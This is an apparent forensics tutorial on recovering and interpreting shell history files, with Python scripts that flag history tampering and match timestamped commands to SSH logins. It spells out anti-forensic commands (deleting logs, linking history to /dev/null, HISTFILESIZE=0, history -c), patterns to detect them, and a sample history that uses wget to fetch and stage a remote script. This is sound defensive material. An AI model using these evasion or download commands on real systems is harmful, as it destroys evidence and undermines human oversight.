By default, Bash records the commands typed in an interactive shell so the user can recall them later; it is the shell, not the operating system, that keeps this record. In a post-mortem forensic context (e.g., analyzing a disk image mounted read-only at /mnt/analysis/), these files are goldmines, but only if the investigator understands how and when they are written.
The file is located in the user's home directory unless the HISTFILE variable points elsewhere:
Root User: /root/.bash_history
Standard Users: /home/<username>/.bash_history
Service Accounts: Wherever /etc/passwd says the account's home is, which is frequently an application directory (e.g., /var/www for www-data on Debian-based systems, giving /var/www/.bash_history). On a mounted image, enumerate home directories from /mnt/analysis/etc/passwd rather than guessing.
2. The Buffer Mechanism (Critical Forensic Nuance)
Understanding how Bash writes to disk is crucial for accurate timeline reconstruction. Bash does not write to .bash_history in real time.
Initialization: When an interactive shell starts, Bash reads the file named by HISTFILE (default ~/.bash_history) into an in-memory history list.
Session Activity: Commands the user executes are added only to that in-memory list. Nothing touches the disk unless the user runs history -a or history -w, or PROMPT_COMMAND has been configured to do so.
Commit to Disk: The list is written to the file when the shell exits cleanly (exit, logout, closing the terminal window, or the SIGHUP that follows a dropped connection). If the histappend shell option is set (Ubuntu's default .bashrc sets it), new lines are appended; otherwise the file is overwritten with the in-memory list, so with several concurrent sessions the last one to exit wins and the others' commands are lost. A shell killed with SIGKILL, or a host that crashes or loses power, writes nothing. Two consequences for analysis: the file's mtime is the time of the last clean exit, not the time of the commands; and the commands of one session form a contiguous block in typed order, wherever that block lands relative to other sessions.
Anti-Forensics (Cleanup): The cleanup commands themselves are often recorded: deleting logs (rm -rf /var/log/*), securely shredding files (shred config.php), or clearing the current session history (history -c). Note what history -c actually does: it empties the in-memory list, so it and everything typed before it in that session never reach disk, while commands typed after it are still written at exit. A history file whose only recent content is a short tail of innocuous commands is consistent with that pattern.
Attackers often pivot to other interactive tools that maintain their own hidden history files. Investigators must thoroughly scan user directories for these alternative artifacts:
Alternative Shells
Zsh (.zsh_history): The default shell on macOS since Catalina and on Kali Linux since 2020.4, so it is common on developer workstations and on attacker-built hosts alike. If the EXTENDED_HISTORY option was set, each line is stored as : <epoch>:<duration>;<command>, which gives timestamps for free.
Python (.python_history): Records commands typed into the interactive interpreter, which attackers often use to spawn a pty or a reverse shell or to manipulate local data.
Interactive Applications
Database Clients (.mysql_history, .psql_history, .sqlite_history): Can reveal SQL injection testing, data exfiltration queries, or clear-text passwords typed into CREATE USER or GRANT statements.
Text Editors (.viminfo, and nano's search history in ~/.nano/search_history or ~/.local/share/nano/search_history depending on the release): Record which files were opened, command-line history, and search/replace strings, which can show exactly how a configuration file was backdoored.
Other Tools (.lesshst, .node_repl_history, .irb_history): Pagers and language REPLs keep similar files; any dotfile in a home directory whose name ends in history or hst deserves a look.
A common technique is to delete the history file and replace it with a symbolic link to /dev/null (ln -sf /dev/null ~/.bash_history).
On the mounted image, ls -la /mnt/analysis/root/.bash_history shows .bash_history -> /dev/null, and everything the shell writes at exit is discarded. The link's own ctime (stat, or ls -lac) records when it was planted, which is itself a useful timeline anchor for the start of the attacker's cleanup.
If export HISTFILESIZE=0 or export HISTSIZE=0 is planted in .bashrc or .profile, the shell keeps zero lines on disk or in memory respectively. HISTFILESIZE=0 is especially destructive: Bash truncates the history file to that size as soon as the variable is assigned, so the existing history is wiped the next time the user logs in, leaving a zero-byte .bash_history next to the offending rc line. Related variants to grep for are unset HISTFILE, export HISTFILE=/dev/null, and set +o history. Any of these can also be typed mid-session rather than planted, in which case the rc files are clean and the whole session, including the commands typed before recording was disabled, is lost at exit.
Many distributions ship a default .bashrc with HISTCONTROL=ignoreboth (ignorespace plus ignoredups; Ubuntu's does). With ignorespace in effect, any command typed with a leading Space character (e.g., " ./malware", note the space) is never added to the history list and therefore never reaches disk. Nothing in the file marks the gap, so the absence of a command from history is never evidence that it was not run. HISTIGNORE patterns have the same effect for matching commands. This is a severe limitation of the artifact.
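The checks just described (the /dev/null symlink, history variables planted in rc files, ignorespace) and the alternative-artifact inventory from the previous section, combined into one triage script. This is an added example, not code from the original article. It assumes the image is mounted at a root directory whose etc/passwd is readable and uses the standard artifact names listed above (nano's search-history path varies by release, so both locations are checked); the sample image it builds in a temporary directory is constructed for the demonstration.

```python
"""Triage history artifacts and anti-forensic settings under a mounted image.

Added example, not code from the original article. It assumes the image is
mounted read-only at some root (e.g. /mnt/analysis) and that its /etc/passwd
is readable; home directories are taken from there instead of guessed.
"""
import os
import re
import tempfile
from pathlib import Path

# Per-user history files written by interactive tools. nano stores its
# search/replace history under one of two directories depending on release.
HISTORY_ARTIFACTS = [
    ".bash_history", ".zsh_history", ".python_history", ".mysql_history",
    ".psql_history", ".sqlite_history", ".viminfo", ".lesshst",
    ".node_repl_history", ".nano/search_history",
    ".local/share/nano/search_history",
]
RC_FILES = [".bashrc", ".bash_profile", ".profile", ".bash_logout", ".zshrc"]

# rc-file lines that disable or truncate Bash history. Spacing and a leading
# 'export' vary, so each pattern tolerates both.
TAMPER_PATTERNS = [
    (re.compile(r"^\s*(export\s+)?HISTFILESIZE\s*=\s*0\b"), "HISTFILESIZE=0 truncates the file to zero lines"),
    (re.compile(r"^\s*(export\s+)?HISTSIZE\s*=\s*0\b"), "HISTSIZE=0 keeps no in-memory history"),
    (re.compile(r"^\s*(export\s+)?HISTFILE\s*=\s*/dev/null\b"), "HISTFILE=/dev/null discards the history at exit"),
    (re.compile(r"^\s*unset\s+HISTFILE\b"), "unset HISTFILE writes nothing at exit"),
    (re.compile(r"^\s*set\s+\+o\s+history\b"), "set +o history stops recording"),
]
IGNORESPACE = re.compile(r"^\s*(export\s+)?HISTCONTROL\s*=.*ignore(space|both)")

def home_dirs(root):
    """Yield (user, home path under root) from the image's /etc/passwd."""
    for line in (Path(root) / "etc" / "passwd").read_text(errors="replace").splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[5].startswith("/"):
            yield fields[0], Path(root) / fields[5].lstrip("/")

def audit_home(user, home):
    """Return (user, kind, detail) findings for one home directory."""
    findings = []
    for rel in HISTORY_ARTIFACTS:
        p = home / rel
        if p.is_symlink():  # lstat: the link itself, whether or not its target exists
            target = os.readlink(p)
            kind = "symlinked-to-devnull" if target == "/dev/null" else "symlinked"
            findings.append((user, kind, f"{rel} -> {target} (link ctime={int(p.lstat().st_ctime)})"))
        elif p.is_file():
            st = p.stat()
            findings.append((user, "artifact", f"{rel} size={st.st_size} mtime={int(st.st_mtime)}"))
    for rel in RC_FILES:
        p = home / rel
        if not p.is_file():
            continue
        for n, line in enumerate(p.read_text(errors="replace").splitlines(), 1):
            for pat, desc in TAMPER_PATTERNS:
                if pat.search(line):
                    findings.append((user, "rc-tamper", f"{rel}:{n}: {desc}"))
            if IGNORESPACE.search(line):
                findings.append((user, "ignorespace", f"{rel}:{n}: commands typed with a leading space are never recorded"))
    return findings

def audit_image(root):
    """Run audit_home for every account whose home directory exists on the image."""
    out = []
    for user, home in home_dirs(root):
        if home.is_dir():
            out.extend(audit_home(user, home))
    return out

def build_sample_image(root):
    """Constructed sample image: a tampered root account, a normal user, and www-data."""
    root = Path(root)
    (root / "etc").mkdir(parents=True)
    (root / "etc" / "passwd").write_text(
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
        "dev:x:1000:1000:dev:/home/dev:/bin/bash\n"
    )
    (root / "root").mkdir()
    (root / "root" / ".bash_history").symlink_to("/dev/null")
    (root / "root" / ".bashrc").write_text("export HISTFILESIZE=0\nexport HISTSIZE=0\nunset HISTFILE\n")
    (root / "home" / "dev").mkdir(parents=True)
    (root / "home" / "dev" / ".bash_history").write_text("ls\nsudo -l\n")
    (root / "home" / "dev" / ".python_history").write_text("import socket\n")
    (root / "home" / "dev" / ".bashrc").write_text("HISTCONTROL=ignoreboth\nshopt -s histappend\n")
    (root / "var" / "www").mkdir(parents=True)
    (root / "var" / "www" / ".mysql_history").write_text("select user,password from users;\n")

def demo():
    """Build the constructed image in a temp dir and return the audit findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_image(tmp)
        return audit_image(tmp)

if __name__ == "__main__":
    for user, kind, detail in demo():
        print(f"{user:10} {kind:22} {detail}")
```

Point audit_image() at the real mount point instead of the constructed sample. A symlinked-to-devnull or rc-tamper finding should send you to the link's ctime and the rc file's mtime for when the tampering was planted, and an ignorespace finding is a reminder that the absence of a command proves nothing.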
To maximize the value of shell history, analysts must adopt a holistic approach.
Audit Service Accounts: Do not focus solely on the root user. If a web application is compromised, the history file of the www-data or jenkins user may contain the initial web shell commands or reverse shell executions. A nologin shell in /etc/passwd does not rule this out: an attacker who lands through a web shell typically upgrades to an interactive bash or Python pty, and that shell writes history into the account's home directory like any other.
Timestamp Analysis: By default, Bash records no execution times. If HISTTIMEFORMAT was set (to any non-empty value) in the session that wrote the file, each command in .bash_history is preceded by a line of the form #<epoch> holding the time the command was entered, not the time the file was written, so these survive the write-on-exit buffering intact and are invaluable for timeline generation. Lines written before the variable was ever set carry no timestamp, and the history builtin displays a substitute time for them, so read the raw file rather than trusting history output.
Log Correlation: Cross-reference the shell history with the Linux authentication logs (auth.log or secure). If an SSH login from a suspicious IP occurs at 14:00 and disconnects at 14:10 and the session exited cleanly, its commands appear as one contiguous block in .bash_history, at the end of the file if it was the last session to close. Without timestamps, the mtime of .bash_history is the time of the last clean exit and should fall at or just after that disconnect. Remember that sessions overwrite rather than append when histappend is off, so the block may be missing entirely. wtmp (last -f /mnt/analysis/var/log/wtmp) gives the same session boundaries in binary form.
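Timestamp parsing and session correlation as described in the last two items, as an added example that is not from the original article. It parses Bash's #<epoch> lines (and, going beyond the text, Zsh EXTENDED_HISTORY lines), pairs each sshd Accepted line with the matching pid's session-closed line from auth.log, and tags each command with the session whose window contains it. The history and log lines are constructed; the year (syslog lines omit it) and the assumption that the imaged host kept UTC are inputs the analyst must confirm.

```python
"""Parse timestamped shell history and attribute commands to SSH sessions.

Added example, not code from the original article. The sample history and
auth.log lines below are constructed; the log year (syslog omits it) and a UTC
clock on the imaged host are assumptions the analyst must confirm.
"""
import re
from datetime import datetime, timezone

# Bash with HISTTIMEFORMAT set writes '#<epoch>' on the line before each
# command. Zsh with EXTENDED_HISTORY writes ': <epoch>:<duration>;<command>'.
BASH_TS = re.compile(r"^#(\d{9,10})$")
ZSH_EXT = re.compile(r"^: (\d{9,10}):(\d+);(.*)$")
AUTH_LINE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d\d:\d\d:\d\d) \S+ sshd\[(\d+)\]: (.*)$")
ACCEPTED = re.compile(r"^Accepted \S+ for (\S+) from (\S+) port \d+")

def parse_history(text):
    """Return [(epoch or None, command)]; commands with no preceding
    '#<epoch>' line (written before HISTTIMEFORMAT was set) get None."""
    records, pending = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = BASH_TS.match(line)
        if m:
            pending = int(m.group(1))
            continue
        m = ZSH_EXT.match(line)
        if m:
            records.append((int(m.group(1)), m.group(3)))
        else:
            records.append((pending, line))
        pending = None
    return records

def syslog_epoch(mon, day, hms, year):
    """Convert a year-less syslog timestamp to epoch seconds, assuming UTC."""
    dt = datetime.strptime(f"{year} {mon} {int(day):02d} {hms}", "%Y %b %d %H:%M:%S")
    return int(dt.replace(tzinfo=timezone.utc).timestamp())

def parse_ssh_sessions(text, year):
    """Pair sshd 'Accepted' lines with the same pid's 'session closed' line."""
    open_by_pid, sessions = {}, []
    for line in text.splitlines():
        m = AUTH_LINE.match(line)
        if not m:
            continue
        mon, day, hms, pid, msg = m.groups()
        ts = syslog_epoch(mon, day, hms, year)
        a = ACCEPTED.match(msg)
        if a:
            open_by_pid[pid] = {"user": a.group(1), "ip": a.group(2), "pid": int(pid), "start": ts, "end": None}
        elif "session closed for user" in msg and pid in open_by_pid:
            s = open_by_pid.pop(pid)
            s["end"] = ts
            sessions.append(s)
    sessions.extend(open_by_pid.values())  # never closed: crash, SIGKILL, or still open at imaging
    return sessions

def attribute(records, sessions):
    """Tag each (epoch, command) with the SSH session whose window contains it."""
    out = []
    for ts, cmd in records:
        label = None
        if ts is not None:
            for s in sessions:
                if s["start"] <= ts and (s["end"] is None or ts <= s["end"]):
                    label = f"{s['user']}@{s['ip']} pid={s['pid']}"
                    break
        out.append((ts, cmd, label))
    return out

# Constructed sample: www-data's history written with HISTTIMEFORMAT set, and
# the sshd lines for one login from 203.0.113.7 (a documentation address).
SAMPLE_HISTORY = """\
#1709474420
id
#1709474455
wget http://203.0.113.7/s.sh -O /tmp/s.sh
#1709474900
chmod +x /tmp/s.sh
#1709477700
ls
"""
SAMPLE_AUTH_LOG = """\
Mar  3 14:00:12 web01 sshd[2311]: Accepted publickey for www-data from 203.0.113.7 port 51234 ssh2: RSA SHA256:constructed
Mar  3 14:00:12 web01 sshd[2311]: pam_unix(sshd:session): session opened for user www-data by (uid=0)
Mar  3 14:10:03 web01 sshd[2311]: pam_unix(sshd:session): session closed for user www-data
"""

def demo():
    """Attribute the sample history to the sample session (year 2024 assumed)."""
    return attribute(parse_history(SAMPLE_HISTORY), parse_ssh_sessions(SAMPLE_AUTH_LOG, 2024))

if __name__ == "__main__":
    for ts, cmd, who in demo():
        when = datetime.fromtimestamp(ts, timezone.utc).isoformat() if ts else "unknown"
        print(f"{when}  {who or 'no matching session'}  {cmd}")
```

The first three sample commands fall inside the 14:00:12 to 14:10:03 window and are tagged with that session; the final ls at 14:55 gets no session and must be explained some other way (a console login, a session that never closed cleanly, or a clock problem). Sessions with no closing line are kept open-ended rather than dropped, since a killed shell is exactly the case where the history file tells you nothing.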